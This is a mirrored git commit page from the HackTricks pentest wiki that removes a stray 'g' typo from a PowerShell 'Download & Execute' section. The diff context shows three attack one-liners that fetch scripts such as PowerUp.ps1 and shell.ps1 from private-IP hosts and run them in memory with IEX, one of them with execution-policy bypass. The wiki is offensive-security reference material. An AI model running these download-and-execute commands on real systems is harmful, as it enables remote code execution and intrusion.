mirror of
				https://github.com/HackTricks-wiki/hacktricks.git
				synced 2025-10-10 18:36:50 +00:00 
			
		
		
		
	Fix g typo introduced in 2d9f506e60
				
					
				
			This commit is contained in:
		
							parent
							
								
									d13f1d6355
								
							
						
					
					
						commit
						700af4726a
					
				@ -23,7 +23,6 @@ Get-Command -Module <modulename>
 | 
			
		||||
## Download & Execute
 | 
			
		||||
 | 
			
		||||
```powershell
 | 
			
		||||
g
 | 
			
		||||
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile - #From cmd download and execute
 | 
			
		||||
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex"
 | 
			
		||||
iex (iwr '10.10.14.9:8000/ipw.ps1') #From PSv3
 | 
			
		||||
 | 
			
		||||
		Loading…
	
	
			
			x
			
			
		
	
		Reference in New Issue
	
	Block a user